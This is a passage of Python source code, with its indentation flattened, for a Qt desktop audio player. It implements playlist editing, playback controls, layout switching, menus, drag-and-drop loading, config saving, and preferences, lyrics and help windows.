self.totalTimeLabel.setText(lib.to_hhmmss(duration))
def update_position(self):
# Set time slider value, refresh labels
position = self.player.position()
self.timeSlider.setValue(position)
self.timePositionLabel.setText(lib.to_hhmmss(position))
def initPlaylist(self):
# Create QMediaPlaylist, connect to player, create and connect playlist model, connect media control pressed signals to playlist methods
self.playlist = QtMultimedia.QMediaPlaylist(self)
self.player.setPlaylist(self.playlist)
self.playlistModel = PlaylistModel(self.playlist)
self.control_previous.pressed.connect(self.previousTrack)
self.control_next.pressed.connect(self.nextTrack)
self.playlist.currentIndexChanged.connect(self.playlistIndexChanged)
# Create playlist view with model passed, create selection model from playlist view and connect playlist selection changed method
self.playlistView = PlaylistView(self.playlistModel)
# self.playlistViewSelectionModel = self.playlistView.selectionModel()
# self.playlistViewSelectionModel.selectionChanged.connect(self.playlist_selection_changed)
# Set view selection mode to abstract item view extended selection and connect double click signal to switch media
self.playlistView.setSelectionMode(QtWidgets.QAbstractItemView.ExtendedSelection)
self.playlistView.doubleClicked.connect(self.switchMedia)
# Accept drag and drop
self.setAcceptDrops(True)
def previousTrack(self):
self.playlist.previous()
self.play()
def nextTrack(self):
self.playlist.next()
self.play()
def updatePlayingState(self):
if self.isPlaying():
self.play()
else:
self.pause()
def playlistIndexChanged(self, index: int):
# Save the playlist index to the config
self.savePlaylistIndex(index)
def savePlaylistIndex(self, index: int):
# Write the index to the config dict and proceed to write the dict to the main config JSON
lib.config["playlistCurrentIndex"] = index
lib.writeToMainConfigJSON(lib.config)
def setPlaylistIndexFromConfig(self):
# If the config dict contains the playlist current index, set the playlist current index, otherwise save the playlist index to the config
if lib.config.__contains__("playlistCurrentIndex"):
self.playlist.setCurrentIndex(lib.config["playlistCurrentIndex"])
else:
self.savePlaylistIndex(self.playlist.currentIndex())
# Play and pause to initialise metadata and cover art
self.play()
self.pause()
#
# Revise
#
def playlist_moveDown(self):
# Get selected indexes on the playlist view and save the current playlist index
selectedIndexes = self.playlistView.selectedIndexes()
currentPlaylistIndex = self.playlist.currentIndex()
# If there are selected indexes in the index list, the index list does not contain the current track and the index after (+1) the last selected index is larger than the current index
if len(selectedIndexes) > 0 and selectedIndexes.__contains__(self.playlistModel.index(currentPlaylistIndex)) == False and selectedIndexes[len(selectedIndexes) - 1].row() + 1 > currentPlaylistIndex:
# Get the first and maximum index rows
firstIndex = selectedIndexes[0].row()
maxIndex = selectedIndexes[len(selectedIndexes) - 1].row()
# Get selected media
media = self.getSelectedMedia(firstIndex, maxIndex)
# Set the previous selected indexes
previousSelectedIndexes = self.playlistView.selectedIndexes()
# Insert all of the media in the list to 2 indexes after the current on the playlist, remove the previous original media instances from the playlist and emit the playlist model layout change signal
self.playlist.insertMedia(firstIndex + 2, media)
self.playlist.removeMedia(firstIndex, maxIndex)
self.playlistModel.layoutChanged.emit()
# On the playlist view selection model, call the select function with the selection model deselect parameter to deselect all of the items in the previus selected indexes
len_previousSelectedIndexes = len(previousSelectedIndexes)
self.playlistViewSelectionModel.select(QtCore.QItemSelection(previousSelectedIndexes[0], previousSelectedIndexes[len_previousSelectedIndexes - 1]), QtCore.QItemSelectionModel.Deselect)
# On the playlist view selection model, call the select function with the selection model select parameter to select all of the moved selected indexes (all of the previous selected indexes shifted by 1 over)
self.playlistViewSelectionModel.select(QtCore.QItemSelection(self.playlistModel.index(previousSelectedIndexes[0].row() + 1), self.playlistModel.index(previousSelectedIndexes[len_previousSelectedIndexes - 1].row() + 1)), QtCore.QItemSelectionModel.Select)
def playlist_moveUp(self):
# Get selected indexes on the playlist view and save the current playlist index
selectedIndexes = self.playlistView.selectedIndexes()
currentPlaylistIndex = self.playlist.currentIndex()
# If there are selected indexes in the index list, the index list does not contain the current track and the index before (-1) the last selected index is larger than the current index
if len(selectedIndexes) > 0 and selectedIndexes.__contains__(self.playlistModel.index(currentPlaylistIndex)) == False and selectedIndexes[0].row() - 1 > currentPlaylistIndex:
# Get the first and maximum index rows
firstIndex = selectedIndexes[0].row()
maxIndex = selectedIndexes[len(selectedIndexes) - 1].row()
# Get selected media
media = self.getSelectedMedia(firstIndex, maxIndex)
# Set the previous selected indexes
previousSelectedIndexes = self.playlistView.selectedIndexes()
# Insert all of the media in the list to 1 indexes before the current on the playlist, remove the previous original media instances (+1 to first and maximum) from the playlist and emit the playlist model layout change signal
self.playlist.insertMedia(firstIndex - 1, media)
self.playlist.removeMedia(firstIndex + 1, maxIndex + 1)
self.playlistModel.layoutChanged.emit()
# On the playlist view selection model, call the select function with the selection model deselect parameter to deselect all of the items in the previus selected indexes
len_previousSelectedIndexes = len(previousSelectedIndexes)
self.playlistViewSelectionModel.select(QtCore.QItemSelection(previousSelectedIndexes[0], previousSelectedIndexes[len_previousSelectedIndexes - 1]), QtCore.QItemSelectionModel.Deselect)
# On the playlist view selection model, call the select function with the selection model select parameter to select all of the moved selected indexes (all of the previous selected indexes shifted by 1 before)
self.playlistViewSelectionModel.select(QtCore.QItemSelection(self.playlistModel.index(previousSelectedIndexes[0].row() - 1), self.playlistModel.index(previousSelectedIndexes[len_previousSelectedIndexes - 1].row() - 1)), QtCore.QItemSelectionModel.Select)
def getSelectedMedia(self, firstIndex: int, maxIndex: int):
# Append all selected media + 1 from playlist to a QMediaContent list
media: List[QtMultimedia.QMediaContent] = []
for i in range(firstIndex, maxIndex + 1):
media.append(self.playlist.media(i))
return media
def playlist_clear(self):
# Clear the playlist, clear the media config log and emit the playlist model layout changed signal
self.playlist.clear()
lib.clearConfigFile(lib.configDir, lib.mediaFileName)
self.playlistModel.layoutChanged.emit()
def switchLayout(self, layout: int):
# Switch to the mini layout if the layout is 1 - otherwise switch to the standard layout, and for both add the layout index to the config and write to disk
if layout == 1:
self.switchToMinimalLayout()
self.currentLayout = 1
else:
self.switchToStandardLayout()
self.currentLayout = 0
lib.config["layout"] = self.currentLayout
lib.writeToMainConfigJSON(lib.config)
def toggleLayout(self):
# If the current layout is the standard (0), switch to the mini (1) and vice versa
if self.currentLayout == 0:
self.switchLayout(1)
else:
self.switchLayout(0)
def switchToMinimalLayout(self):
# Hide extra widgets, set the label alignment and set the fixed size to the mini dimensions
self.volumeSlider.hide()
self.coverart_label.hide()
self.control_playlist_moveDown.hide()
self.control_playlist_moveUp.hide()
self.control_playlist_remove.hide()
self.control_playlist_clear.hide()
self.playlistView.hide()
self.metadata_label.setAlignment(QtCore.Qt.AlignCenter)
self.setFixedSize(self.width_mini, self.height_mini)
def switchToStandardLayout(self):
# Show the standard widgets, show the cover art if it was previously displayed [there is media, the coverart pixmap exists and is not a null pixmap], reset the label alignment, set the original maximum and minimum sizes and resize the window
self.volumeSlider.show()
coverart_pixmap = self.coverart_label.pixmap()
if self.playlist.mediaCount() > 0 and coverart_pixmap != None and not coverart_pixmap.isNull():
self.coverart_label.show()
self.control_playlist_moveDown.show()
self.control_playlist_moveUp.show()
self.control_playlist_remove.show()
self.control_playlist_clear.show()
self.playlistView.show()
self.metadata_label.setAlignment(QtCore.Qt.AlignLeft)
self.setMaximumSize(lib.maxWidth, lib.maxHeight)
self.setMinimumSize(self.originalMinimumSize)
self.resize(self.width, self.height)
def playlist_position_changed(self, index: QtCore.QModelIndex):
#
# Not used
#
# Set playlist current index from index
self.playlist.setCurrentIndex(index)
def playlist_selection_changed(self, selection: QtCore.QItemSelection):
#
# Deprecated
#
# If selection indexes are passed, set index to the first row from the index array
if len(selection.indexes()) > 0:
index = selection.indexes()[0].row()
# If index is not negative, (deselection), set playlist view current index to model index from local index
if index > -1:
self.playlistView.setCurrentIndex(self.playlistModel.index(index))
def init_playpause(self):
# Initialise the play/pause button with text/icon and signal connection
self.control_playpause.setText(self.tr("Play"))
self.control_playpause.pressed.connect(self.play)
def pause(self):
# Call the pause method of the player and replace play/pause button properties to play; disconnect, set icon and connect to play method
self.player.pause()
self.control_playpause.pressed.disconnect()
self.control_playpause.setText("Play")
self.control_playpause.pressed.connect(self.play)
def play(self):
# If playlist has media, call the play method of the player and replace play/pause button properties to pause; disconnect, set icon and connect to pause method
if self.playlist.mediaCount() > 0:
self.player.play()
self.control_playpause.pressed.disconnect()
self.control_playpause.setText(self.tr("Pause"))
self.control_playpause.pressed.connect(self.pause)
def playpause(self):
# If not playing, playing, otherwise pause
if self.isPlaying():
self.pause()
else:
self.play()
#
# Revise
#
def update_metadata(self, media: QtMultimedia.QMediaContent):
# Todo: if no media is playing, hide the metadata, otherwise set the metadata from the metadata class and set the label text
if media.isNull():
self.metadata_label.hide()
else:
mediaPath = lib.urlStringToPath(media.canonicalUrl().toString())
if getattr(self, "metadata_separator", None) == None:
self.metadata_separator = " - "
mutagen_metadata = mutagen.File(mediaPath)
self.metadata = lib.Metadata(mutagen_metadata)
if self.metadata.title and self.metadata.album:
metadata_string = self.metadata.title + self.metadata_separator + self.metadata.album
else:
metadata_string = media.canonicalUrl().fileName()
self.metadata_label.setText(metadata_string)
self.metadata_label.show()
def update_coverart(self, media: QtMultimedia.QMediaContent):
# If no media is playing, hide the cover art, otherwise separate the url string into a path, set the label pixmap and show
if media.isNull():
self.coverart_label.hide()
else:
mediaPath = lib.urlStringToPath(media.canonicalUrl().toString())
coverart_pixmap = lib.get_coverart_pixmap_from_metadata(mutagen.File(mediaPath))
if coverart_pixmap == None:
coverart_path = lib.get_coverart(os.path.dirname(mediaPath))
if coverart_path:
coverart_pixmap = QtGui.QPixmap()
coverart_pixmap.load(coverart_path)
if coverart_pixmap:
self.coverart_label.setPixmap(coverart_pixmap.scaledToWidth(self.coverart_width))
self.coverart_label.show()
else:
self.coverart_label.hide()
# If the player is in the minimal layout mode, re-hide the coverart label
if self.currentLayout == 1:
self.coverart_label.hide()
def update_media(self, media: QtMultimedia.QMediaContent):
# If playing, update the play/pause button to the playing state, otherwise set its properties to the paused state
self.updatePlayingState()
# Called on media change, update track metadata and cover art
self.update_metadata(media)
self.update_coverart(media)
# If the lyrics view has been created, emit the track changed signal
if self.lyricsView != None:
self.lyricsView.trackChanged.emit()
def connect_update_media(self):
# Connect cover art update method to playlist current media changed signal
self.playlist.currentMediaChanged.connect(self.update_media)
def createLayout(self):
# Create main vertical layout, add horizontal layouts with added sub-widgets to vertical layout
detailsGroup = QtWidgets.QGroupBox()
hControlLayout = QtWidgets.QHBoxLayout()
hControlLayout.addWidget(self.control_previous)
hControlLayout.addWidget(self.control_playpause)
hControlLayout.addWidget(self.control_next)
hControlLayout.addWidget(self.volumeSlider)
hTimeLayout = QtWidgets.QHBoxLayout()
hTimeLayout.addWidget(self.timePositionLabel)
hTimeLayout.addWidget(self.timeSlider)
hTimeLayout.addWidget(self.totalTimeLabel)
vDetailsLayout = QtWidgets.QVBoxLayout()
vDetailsLayout.addLayout(hControlLayout)
vDetailsLayout.addLayout(hTimeLayout)
vDetailsLayout.addWidget(self.metadata_label)
hDetailsLayout = QtWidgets.QHBoxLayout()
hDetailsLayout.addLayout(vDetailsLayout)
hDetailsLayout.addWidget(self.coverart_label)
detailsGroup.setLayout(hDetailsLayout)
actionsLayout = QtWidgets.QHBoxLayout()
actionsLayout.addWidget(self.control_playlist_moveDown)
actionsLayout.addWidget(self.control_playlist_moveUp)
actionsLayout.addWidget(self.control_playlist_remove)
actionsLayout.addWidget(self.control_playlist_clear)
self.vLayout = QtWidgets.QVBoxLayout()
self.vLayout.addWidget(detailsGroup)
self.vLayout.addLayout(actionsLayout)
self.vLayout.addWidget(self.playlistView)
self.vLayout.addWidget(self.basichelp_label)
def createCentralWidget(self):
# Create central widget, call set central widget method and set widget layout
self.centralWidget = QtWidgets.QWidget()
self.setCentralWidget(self.centralWidget)
self.centralWidget.setLayout(self.vLayout)
def createMenus(self):
# Create main menu from menuBar method, use addMenu for submenus and add QActions accordingly with triggered connect method, set shortcut from QKeySequence on QActions
self.mainMenu = self.menuBar()
fileMenu = self.mainMenu.addMenu(self.tr("File"))
playerMenu = self.mainMenu.addMenu(self.tr("Player"))
playlistMenu = self.mainMenu.addMenu(self.tr("Playlist"))
helpMenu = self.mainMenu.addMenu(self.tr("Help"))
closeAction = QtWidgets.QAction(self.tr("Close Window"), self)
closeAction.triggered.connect(self.closeWindow)
closeAction.setShortcut(QtGui.QKeySequence(self.tr("Ctrl+W", "File|Close Window")))
preferencesAction = QtWidgets.QAction(self.tr("Preferences"), self)
preferencesAction.triggered.connect(self.showPreferences)
preferencesAction.setShortcut(QtGui.QKeySequence(self.tr("Ctrl+,", "File|Preferences")))
openFileAction = QtWidgets.QAction(self.tr("Open File"), self)
openFileAction.triggered.connect(self.open_files)
openFileAction.setShortcut(QtGui.QKeySequence(self.tr("Ctrl+O", "File|Open")))
openDirAction = QtWidgets.QAction(self.tr("Open Directory"), self)
openDirAction.triggered.connect(self.open_directory)
openDirAction.setShortcut(QtGui.QKeySequence(self.tr("Ctrl+Shift+O", "File|Open Directory")))
switchSizeAction = QtWidgets.QAction(self.tr("Switch Player Size"), self)
switchSizeAction.triggered.connect(self.toggleLayout)
switchSizeAction.setShortcut(QtGui.QKeySequence(self.tr("Ctrl+Shift+S", "Player|Switch Player Size")))
lyricsAction = QtWidgets.QAction(self.tr("Lyrics"), self)
lyricsAction.triggered.connect(self.showLyrics)
lyricsAction.setShortcut(QtGui.QKeySequence(self.tr("Ctrl+L", "Player|Lyrics")))
playlistRemoveAction = QtWidgets.QAction(self.tr("Remove"), self)
playlistRemoveAction.triggered.connect(self.removeMedia)
playlistClearAction = QtWidgets.QAction(self.tr("Clear"), self)
playlistClearAction.triggered.connect(self.playlist_clear)
playlistClearAction.setShortcut(QtGui.QKeySequence(self.tr("Ctrl+Backspace", "Playlist|Clear")))
basicHelpAction = QtWidgets.QAction(self.tr("Basic Help"), self)
basicHelpAction.triggered.connect(self.showBasicHelp)
helpWindowAction = QtWidgets.QAction(self.tr("Help Window"), self)
helpWindowAction.triggered.connect(self.showHelpWindow)
helpWindowAction.setShortcut(QtGui.QKeySequence(self.tr("Ctrl+Shift+H", "Help|Help Window")))
fileMenu.addAction(closeAction)
fileMenu.addAction(preferencesAction)
fileMenu.addAction(openFileAction)
fileMenu.addAction(openDirAction)
playerMenu.addAction(switchSizeAction)
playerMenu.addAction(lyricsAction)
playlistMenu.addAction(playlistRemoveAction)
playlistMenu.addAction(playlistClearAction)
helpMenu.addAction(basicHelpAction)
helpMenu.addAction(helpWindowAction)
def closeWindow(self):
# Get the active window from the QApplication, quit the application if the active window is the player, otherwise hide and then destroy that window
activeWindow = self.app.activeWindow()
if activeWindow == self:
self.app.quit()
else:
# Note: the widget must be hidden before destruction, otherwise a segmentation fault can occur when quitting the application
activeWindow.hide()
activeWindow.destroy()
def showPreferences(self):
# Create instance of preferences widget with the QApplication given as a parameter
self.preferencesView = Preferences(self.app, self)
def showLyrics(self):
# Create instance of lyrics widget
self.lyricsView = LyricsWidget(self)
def showHelpWindow(self):
# Create instance of help widget
self.helpView = HelpWidget(self)
def showBasicHelp(self):
# Show the label
self.basichelp_label.show()
def open_files(self):
# Set last media count for playlist media check later on
self.lastMediaCount = self.playlist.mediaCount()
# Set paths from QFileDialog getOpenFileNames, filetypes formatted as "Name (*.extension);;Name" etc.
paths, _ = QtWidgets.QFileDialog.getOpenFileNames(self, self.tr("Open File"), "", self.tr("All Files (*.*);;Waveform Audio (*.wav);;mp3 Audio (*.mp3)"))
# For each path, add media QMediaContent from local file to playlist if the filetype is supported
if paths:
for path in paths:
if self.isSupportedFileFormat(path):
self.addMediaFromFile(path)
# Emit playlist model layout change and play if paused
self.playlistModel.layoutChanged.emit()
# Check new media and play if conditions are met
self.playNewMedia()
# Write media to config
self.writeMediaToConfig()
def isSupportedFileFormat(self, path: str) -> bool:
# Split the path by the extension separator and if the list of supported formats contains the last element of the list, return true
split = path.split(os.path.extsep)
if lib.supportedFormats.__contains__(split[len(split)-1]):
return True
else:
return False
def open_directory(self):
# Set last media count for playlist media check later on
self.lastMediaCount = self.playlist.mediaCount()
# Set directory from QFileDialog getExistingDirectory
dirPath = QtWidgets.QFileDialog.getExistingDirectory(self, self.tr("Open Folder"), "")
# If a path was returned, get a directory listing, sort it and for every file in the list get the full path: if the format is supported, add the media to the playlist
if dirPath:
dirList = os.listdir(dirPath)
dirList.sort()
for fname in dirList:
path = os.path.join(dirPath, fname)
if self.isSupportedFileFormat(path):
self.addMediaFromFile(path)
# Emit playlist model layout change and play if paused
self.playlistModel.layoutChanged.emit()
# Check new media and play if conditions are met
self.playNewMedia()
# Write media to config
self.writeMediaToConfig()
def addMediaFromFile(self, path: str):
# Add the media to the playlist with a QMediaContent instance from the local file
self.playlist.addMedia(
QtMultimedia.QMediaContent(QtCore.QUrl.fromLocalFile(path))
)
def addMediaFromConfig(self):
# If the file exists, read in each line of the media log to a list and add the media content from each path to the playlist
paths: List[str] = []
mediaLog = os.path.join(lib.configDir, lib.mediaFileName)
if os.path.isfile(mediaLog):
with open(mediaLog, "r") as mediaData:
paths = mediaData.read().split("\n")
for path in paths:
if path != "":
self.addMediaFromFile(path)
# Emit the playlist model layout changed signal
self.playlistModel.layoutChanged.emit()
def writeMediaToConfig(self):
# Add path from canonical url string of each media item in the playlist to a list and write it to the config
paths: List[str] = []
for i in range(self.playlist.mediaCount()):
urlString = self.playlist.media(i).canonicalUrl().toString()
paths.append(lib.urlStringToPath(urlString))
lib.writeToConfig(lib.configDir, lib.mediaFileName, paths)
def isPlaying(self) -> bool:
if self.player.state() == QtMultimedia.QMediaPlayer.PlayingState:
return True
else:
return False
#
# Revise
#
def removeMedia(self):
# Get the selected indexes from the playlist view and if there are indexes selected, remove the corresponding media from the playlist and emit the playlist model layout change signal
selectedIndexes: List[QtCore.QModelIndex] = self.playlistView.selectedIndexes()
if len(selectedIndexes) > 0:
firstIndex = selectedIndexes[0]
lastIndex = selectedIndexes[len(selectedIndexes)-1]
self.playlist.removeMedia(firstIndex.row(), lastIndex.row())
self.playlistModel.layoutChanged.emit()
def createShortcuts(self):
# Create QShortcuts from QKeySequences with the shortcut and menu item passed as arguments
shortcut_playpause_space = QtWidgets.QShortcut(QtGui.QKeySequence(self.tr("Space")), self)
shortcut_playpause = QtWidgets.QShortcut(QtGui.QKeySequence(QtCore.Qt.Key_MediaPlay), self)
shortcut_playpause_space.activated.connect(self.playpause)
shortcut_playpause.activated.connect(self.playpause)
shortcut_delete = QtWidgets.QShortcut(QtGui.QKeySequence(self.tr("Backspace")), self)
shortcut_delete.activated.connect(self.removeMedia)
shortcut_previous = QtWidgets.QShortcut(QtGui.QKeySequence(QtCore.Qt.Key_MediaLast), self)
shortcut_previous.activated.connect(self.playlist.previous)
shortcut_next = QtWidgets.QShortcut(QtGui.QKeySequence(QtCore.Qt.Key_MediaNext), self)
shortcut_next.activated.connect(self.playlist.next)
if is_admin:
keyboard.add_hotkey(0x83, self.playpause)
#
# Revise
#
# Synopsis of drag and drop:
# - Set accept drops to true
# dragEnterEvent (QDragEnterEvent):
# - Call event accept proposed action method if event mime data has urls
# dropEvent (QDropEvent):
# - Set last media count
# - If a url is a directory, append paths from os.listdir of supported files to a list
# - Sort the list and add urls from the paths
# - Add media to playlist from urls
# - Emit model layout change
# - Call playNewMedia:
# - If not playing and last media count was 0, play
# - Write media to config
#
def dragEnterEvent(self, event: QtGui.QDragEnterEvent):
if event.mimeData().hasUrls():
event.acceptProposedAction()
def dropEvent(self, event: QtGui.QDropEvent):
self.lastMediaCount = self.playlist.mediaCount()
for url in event.mimeData().urls():
path = lib.urlStringToPath(url.toString())
if os.path.isdir(path):
paths: List[str] = []
for fname in os.listdir(path):
split = fname.split(os.path.extsep)
if lib.supportedFormats.__contains__(split[len(split)-1]):
paths.append(os.path.join(path, fname))
if paths:
paths.sort()
for path in paths:
self.playlist.addMedia(
QtMultimedia.QMediaContent(QtCore.QUrl.fromLocalFile(path))
)
else:
split = url.toString().split(os.path.extsep)
if lib.supportedFormats.__contains__(split[len(split)-1]):
self.playlist.addMedia(
QtMultimedia.QMediaContent(url)
)
self.playlistModel.layoutChanged.emit()
self.playNewMedia()
self.writeMediaToConfig()
def playNewMedia(self):
# Play if not playing and the last media count is not 0
if self.isPlaying() == False and self.lastMediaCount == 0:
self.play()
def switchMedia(self):
# Get selected indexes from playlist view, if there are indexes selected, set the new current playlist index and play the new media
selectedIndexes = self.playlistView.selectedIndexes()
if len(selectedIndexes) > 0:
self.playlist.setCurrentIndex(selectedIndexes[0].row())
self.playNewMedia()
#
#
# Revise
#
#
class ClickableLabel(QtWidgets.QLabel):
# - Call super init from init with text and parent passed depending on if they are set or not
# - Emit the pressed signal on the mousePressEvent
pressed = QtCore.Signal()
def __init__(self, text: str = None, parent: QtWidgets.QWidget = None):
if text != None:
super().__init__(text, parent)
else:
super().__init__(parent)
def mousePressEvent(self, event: QtGui.QMouseEvent):
self.pressed.emit()
class Preferences(QtWidgets.QWidget):
# - init:
# - Set geometry variables including from parent widget if a parent was passed, title and application from parameter
# - Call initUI
# - initUI:
# - Set geometry and window title
# - Create widgets and layout
# - Show
def __init__(self, app: QtWidgets.QApplication, parent: QtWidgets.QWidget = None):
super().__init__()
if parent != None:
parentGeometry = parent.geometry()
self.left = parentGeometry.left()
self.top = parentGeometry.top()
else:
self.left = 0
self.top = 0
self.width = 0
self.height = 0
self.title = lib.progName + lib.titleSeparator + self.tr("Preferences")
self.app = app
self.initUI()
def initUI(self):
self.setGeometry(self.left, self.top, self.width, self.height)
self.setWindowTitle(self.title)
self.createWidgets()
self.createLayout()
self.show()
def createWidgets(self):
# Create the style label and combo box, add options from style list
self.styleLabel = QtWidgets.QLabel(self.tr("Style"), self)
self.styleBox = QtWidgets.QComboBox(self)
for style in lib.styles:
self.styleBox.addItem(self.tr(style.name))
# Connect the combo box index change signal to the style selection handler and set the current index to the current style
self.styleBox.currentIndexChanged.connect(self.styleSelectionChanged)
self.styleBox.setCurrentIndex(lib.globalStyleIndex)
# Create other widgets and buttons connecting pressed signals
self.button_clearConfig = QtWidgets.QPushButton(self.tr("Clear All Config"))
self.button_clearConfig.pressed.connect(lib.removeConfigDir)
def createLayout(self):
# Create the QGridLayout and add widgets accordingly with coordinates passed as parameters, set the layout alignment and set the layout
layout = QtWidgets.QGridLayout(self)
layout.addWidget(self.styleLabel, 0, 0)
layout.addWidget(self.styleBox, 0, 1)
layout.addWidget(self.button_clearConfig, 1, 0)
layout.setAlignment(QtCore.Qt.AlignTop)
self.setLayout(layout)
def styleSelectionChanged(self, index: int):
# Set the global style index and stylesheet from the current style in the list, set the QApplication stylesheet and update the main config with the new style index
lib.globalStyleIndex = index
lib.globalStyleSheet = lib.styles[lib.globalStyleIndex].styleSheet
self.app.setStyleSheet(lib.globalStyleSheet)
lib.updateMainConfig("style", index)
class LyricsWidget(QtWidgets.QWidget):
# - Signal trackChanged
# - init:
# - Set parent propery
# - Set geometry variables including from the parent window if no geometry was previously recorded in the config for the lyrics widget, otherwise set the previous geometry, as well as title / track detail variables
# - Call initUI
# - initUI:
# - Set the window geometry and title
# - Save the geometry to the config if it has not been previously
# - Set the default text, boolean variables and loading animation properties
# - Create the widgets and layout, along with setting the lyrics token from the executable directory
# - Connect the track changed signal to the search from metadata function, call serach from metadata if the parent player has media
# - Show
trackChanged = QtCore.Signal()
def __init__(self, parent: MainWindow = None):
super().__init__()
self.parent = parent
if lib.config.__contains__("geometry") and lib.config["geometry"].__contains__("lyrics"):
geometry = lib.config["geometry"]["lyrics"]
self.left = geometry["left"]
self.top = geometry["top"]
self.width = geometry["width"]
self.height = geometry["height"]
elif parent != None:
parentGeometry = self.parent.geometry()
self.left = parentGeometry.left()
self.top = parentGeometry.top()
self.width = parentGeometry.width()
self.height = parentGeometry.height()
else:
self.left = lib.defaultLeft
self.top = lib.defaultTop
self.width = lib.lyrics_defaultWidth
self.height = lib.lyrics_defaultHeight
self.title = lib.progName + lib.titleSeparator + self.tr("Lyrics")
self.initUI()
def initUI(self):
self.setGeometry(self.left, self.top, self.width, self.height)
self.setWindowTitle(self.title)
if not lib.config.__contains__("geometry") or not lib.config["geometry"].__contains__("lyrics"):
if not lib.config.__contains__("geometry"):
lib.config["geometry"] = {}
lib.config["geometry"]["lyrics"] = {}
lib.config["geometry"]["lyrics"]["left"] = self.left
lib.config["geometry"]["lyrics"]["top"] = self.top
lib.config["geometry"]["lyrics"]["width"] = self.width
lib.config["geometry"]["lyrics"]["height"] = self.height
self.songText = ""
self.artistText = ""
self.lastSearchedSong = None
self.lastSearchedArtist = None
self.loadingText = ["Loading", "Loading.", "Loading..", "Loading..."]
self.loadedLyrics = False
self.loadingAnimationInterval_ms = 100
self.createWidgets()
self.createLayout()
# lib.setLyricsToken(lib.execDir)
self.trackChanged.connect(self.loadAndSearchFromMetadata)
if not self.parent.player.media().isNull():
self.loadAndSearchFromMetadata()
self.show()
def moveEvent(self, event: QtGui.QMoveEvent):
# Set the left and top keys in the geometry key of the config dictionary to the corresponding geometric values and write the config to disk
lib.config["geometry"]["lyrics"]["left"] = self.geometry().left()
lib.config["geometry"]["lyrics"]["top"] = self.geometry().top()
lib.writeToMainConfigJSON(lib.config)
def resizeEvent(self, event: QtGui.QResizeEvent):
# Set the width and height keys in the geometry key of the config dictionary to the corresponding geometric values and write the config to disk
lib.config["geometry"]["lyrics"]["width"] = self.geometry().width()
lib.config["geometry"]["lyrics"]["height"] = self.geometry().height()
lib.writeToMainConfigJSON(lib.config)
def createWidgets(self):
# Create labels and Line Edit boxes for song details entry, create the search button ad scroll view with the output label and word wrap enabled
self.artistLabel = QtWidgets.QLabel("Artist")
self.songLabel = QtWidgets.QLabel("Song")
self.artistBox = QtWidgets.QLineEdit()
self.artistBox.textChanged.connect(self.setArtistText)
self.artistBox.editingFinished.connect(self.search)
self.songBox = QtWidgets.QLineEdit()
self.songBox.textChanged.connect(self.setSongText)
self.songBox.editingFinished.connect(self.search)
self.searchButton = QtWidgets.QPushButton("Search")
self.searchButton.pressed.connect(self.search)
self.scrollView = QtWidgets.QScrollArea()
self.outputLabel = QtWidgets.QLabel()
self.outputLabel.setWordWrap(True)
self.scrollView.setWidget(self.outputLabel)
self.scrollView.setWidgetResizable(True)
self.infoLabel = QtWidgets.QLabel()
lib.setAltLabelStyle(self.infoLabel)
self.infoLabel.hide()
def createLayout(self):
# Create the group boxes, create the grid layout with coordinates added for each widget comprising song details entry, create the layouts for the button and text groups and set the layout
entryGroup = QtWidgets.QGroupBox()
buttonGroup = QtWidgets.QGroupBox()
textGroup = QtWidgets.QGroupBox()
entryLayout = QtWidgets.QGridLayout()
entryLayout.setSpacing(10)
entryLayout.addWidget(self.artistLabel, 0, 0)
entryLayout.addWidget(self.artistBox, 0, 1)
entryLayout.addWidget(self.songLabel, 1, 0)
entryLayout.addWidget(self.songBox, 1, 1)
buttonLayout = QtWidgets.QHBoxLayout()
buttonLayout.addWidget(self.searchButton)
textLayout = QtWidgets.QHBoxLayout()
textLayout.addWidget(self.scrollView)
entryGroup.setLayout(entryLayout)
buttonGroup.setLayout(buttonLayout)
textGroup.setLayout(textLayout)
layout = QtWidgets.QVBoxLayout()
layout.addWidget(entryGroup)
layout.addWidget(buttonGroup)
layout.addWidget(textGroup)
layout.addWidget(self.infoLabel)
self.setLayout(layout)
def setArtistText(self, text: str):
# Set the artist text
self.artistText = text
def setSongText(self, text: str):
# Set the song text
self.songText = text
def loadAndSearchFromMetadata(self):
# If the player has the metadata set, set the placeholder text from the parent metadata on the song details entry boxes, set the artist and song text and run the search
if self.parent.metadata:
metadata = self.parent.metadata
self.artistBox.setPlaceholderText(metadata.artist)
self.songBox.setPlaceholderText(metadata.title)
self.setArtistText(metadata.artist)
self.setSongText(metadata.title)
self.search()
def search(self):
# If the lyrics object exists, the song and artist names are set and one of the song details has changed, run the second stage search function on a new thread using the threading library, the target specified and the start method
if lib.lyricsObject != None and self.songText != "" and self.artistText != "" and self.lastSearchedArtist != self.artistText or self.lastSearchedSong != self.songText:
searchThread = threading.Thread(target=self._search)
searchThread.start()
def _search(self):
# Start the loading animation, set the song from the lyrics object, switch the loading state when finished, set the output label text from the song lyrics property and set the last searched song and artist
self.loadedLyrics = False
self.loadingAnimation()
self.song = lib.lyricsObject.search_song(self.songText, self.artistText)
self.loadedLyrics = True
self.outputLabel.setText(self.song.lyrics)
self.lastSearchedSong = self.songText
self.lastSearchedArtist = self.artistText
def loadingAnimation(self):
# Run the loading animation on another thread
self.loadingThread = threading.Thread(target=self._loadingAnimation)
self.loadingThread.start()
def _loadingAnimation(self):
# Set the last info text, set the info hidden state, show the info label and whilst the lyrics have not loaded reset the animation index if the animation cycle has completed, set the info label text to the current animation frame text, increment the animation index and sleep for the set interval
lastInfoText = self.infoLabel.text()
if self.infoLabel.isHidden():
infoWasHidden = True
self.infoLabel.show()
else:
infoWasHidden = False
animationIndex = 0
animationFrameCount = len(self.loadingText)
while not self.loadedLyrics:
if animationIndex == animationFrameCount:
animationIndex = 0
self.infoLabel.setText(self.loadingText[animationIndex])
animationIndex += 1
time.sleep(self.loadingAnimationInterval_ms / 1000)
# Reset the info label text to the last recorded value and hide the info label if it was previously hidden
self.infoLabel.setText(lastInfoText)
if infoWasHidden:
self.infoLabel.hide()
#
# Todo: add comments at some point
#
class HelpWidget(QtWidgets.QWidget):
def __init__(self, parent: MainWindow = None):
super().__init__()
self.parent = parent
self.execDir = lib.get_execdir()
self.iconWidth = 50
# Load window geometry from dict
if lib.config.__contains__("geometry") and lib.config["geometry"].__contains__("help"):
geometry = lib.config["geometry"]["help"]
self.left = geometry["left"]
self.top = geometry["top"]
self.width = geometry["width"]
self.height = geometry["height"]
elif parent != None:
parentGeometry = self.parent.geometry()
self.left = parentGeometry.left()
self.top = parentGeometry.top()
self.width = parentGeometry.width()
self.height = parentGeometry.height()
else:
self.left = lib.defaultLeft
self.top = lib.defaultTop
self.width = lib.lyrics_defaultWidth
